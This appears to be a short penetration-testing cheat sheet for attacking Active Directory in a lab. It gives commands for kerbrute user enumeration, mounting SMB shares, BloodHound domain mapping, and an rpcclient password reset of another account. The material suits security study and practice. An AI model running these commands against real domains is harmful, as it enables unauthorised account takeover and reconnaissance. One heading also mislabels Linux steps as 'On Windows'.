# enumerate AD users with kerbrute
kerbrute userenum --dc 10.10.*.* -d domain users.txt
Mount
# mount an anonymous login share
mount -t cifs '//10.10.*.*/ShareName' /mOuNt_Location
# mount an authenticated smb share
mount -t cifs -o 'username=UserName,password=Password' '//10.10.*.*/ShareName' /mOuNt_Location
BloodHound
On Windows
# setup
git clone https://github.com/fox-it/BloodHound.py; cd BloodHound.py; python3 setup.py install
# Running bloodhound.py
python3 bloodhound.py -u userName -p 'PASSWORD' -ns machineIP -d domain.local -c all
# start the neo4j console
sudo neo4j console
# start BloodHound
cd /opt/bloodhound-linux-x64/
./BloodHound
# import all the json files
# mark the obtained user as owned user and the target user as high value target
Reset AD user passwords with rpcclient
# login to rpcclient
rpcclient -U userName machineIP
# password for the user we have access to
rpcclient $> setuserinfo2 {userToChange} 23 '{PasswordToChange}'
# enumerates users which mostly will be AD Users
rpcclient $> enumdomusers
# enumerate printers in the machine
rpcclient $> enumprinters